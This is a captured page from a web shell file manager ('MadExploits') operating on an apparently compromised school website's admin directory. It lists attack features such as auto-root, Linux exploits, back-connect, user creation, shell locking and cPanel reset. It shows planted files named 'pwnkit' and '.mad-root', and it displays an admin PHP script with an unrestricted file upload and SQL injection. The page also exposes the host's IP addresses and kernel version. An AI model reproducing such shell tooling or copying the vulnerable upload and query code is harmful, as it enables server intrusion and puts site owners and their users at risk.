Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.143.218.180
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
sukhanwala /
myadmin /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap
[ DIR ]
drwxr-xr-x
build
[ DIR ]
drwxr-xr-x
cbse
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
file
[ DIR ]
drwxr-xr-x
gallery
[ DIR ]
drwxr-xr-x
news-coverage
[ DIR ]
drwxr-xr-x
pdf
[ DIR ]
drwxr-xr-x
photo
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
shining-star
[ DIR ]
drwxr-xr-x
slider
[ DIR ]
drwxr-xr-x
sym
[ DIR ]
drwxr-xr-x
tc
[ DIR ]
drwxr-xr-x
toppers
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
Gruntfile.js
6.49
KB
-rw-r--r--
add-album.php
1.75
KB
-rw-r--r--
add-cbse-corner.php
2.18
KB
-rw-r--r--
add-class.php
1.75
KB
-rw-r--r--
add-fee.php
3.65
KB
-rw-r--r--
add-gallery.php
3.1
KB
-rw-r--r--
add-news-coverage.php
2.57
KB
-rw-r--r--
add-news.php
2.68
KB
-rw-r--r--
add-pages.php
2.2
KB
-rw-r--r--
add-pdf.php
2.12
KB
-rw-r--r--
add-shining-star.php
2.47
KB
-rw-r--r--
add-slide.php
2.15
KB
-rw-r--r--
add-tc.php
2.43
KB
-rw-r--r--
add-toppers.php
3.28
KB
-rw-r--r--
album.php
3.86
KB
-rw-r--r--
cbse-corner.php
4.02
KB
-rw-r--r--
class.php
3.99
KB
-rw-r--r--
config.php
750
B
-rw-r--r--
error_log
4.53
KB
-rw-r--r--
fee.php
2.78
KB
-rw-r--r--
footer.php
8.33
KB
-rw-r--r--
gallery.php
3.97
KB
-rw-r--r--
header.php
11.44
KB
-rw-r--r--
index.php
5.48
KB
-rw-r--r--
log.php
1.1
KB
-rw-r--r--
login.php
5.73
KB
-rw-r--r--
logout.php
122
B
-rw-r--r--
news-coverage.php
4.04
KB
-rw-r--r--
news.php
4.15
KB
-rw-r--r--
pages.php
3.99
KB
-rw-r--r--
pdf.php
3.96
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
register.php
2.97
KB
-rw-r--r--
shining-star.php
4.07
KB
-rw-r--r--
slide.php
3.9
KB
-rw-r--r--
tc.php
4.04
KB
-rw-r--r--
toppers.php
4.23
KB
-rw-r--r--
update-fee.php
4.37
KB
-rw-r--r--
update-news.php
2.78
KB
-rw-r--r--
update-pages.php
2.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : add-cbse-corner.php
<?php include('header.php');?> <!-- =============================================== --> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> Add CBSE Corner </h1> <ol class="breadcrumb"> <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li> <li><a href="#">Add CBSE Corner</a></li> <li class="active">Add</li> </ol> </section> <!-- Main content --> <section class="content"> <div class="callout callout-info"> <h4>Tip!</h4> <p>This page will use to add new PDF in the admin panel.</p> </div> <!-- Default box --> <?php if(isset($_POST['upload'])) { $title = $_POST['title']; $ext= pathinfo($_FILES['files']['name'], PATHINFO_EXTENSION); $image_name = 'CBSE_'. date('h-i-s').'.'. $ext ; $target_dir = "cbse/"; move_uploaded_file($_FILES['files']['tmp_name'],$target_dir .''. $image_name); $query = "INSERT INTO `cbse_corner` (`title`,`file`) VALUES ('$title','$image_name')"; $query_1 = mysqli_query($mysql_con,$query); if($query_1 > 0) { header('location: cbse-corner.php'); } else{ echo "Something wrong, Please try again"; } } ?> <form method="Post" role="form" enctype="multipart/form-data" action=""> <div class="box-body"> <div class="form-group"> <label for="exampleInputEmail1">File Name</label> <input type="text" name="title" class="form-control" id="exampleInputEmail1" placeholder="Enter Name"> </div> <div class="form-group"> <label for="exampleInputFile">Choose File (Only PDF *)</label> <input type="file" name="files" id="exampleInputFile"> </div> </div> <!-- /.box-body --> <div class="box-footer"> <button type="submit" name="upload" value="submit" class="btn btn-primary">Submit</button> </div> </form> <!-- /.box --> </section> <!-- /.content --> </div> <!-- /.content-wrapper --> <?php include("footer.php"); ?>
Close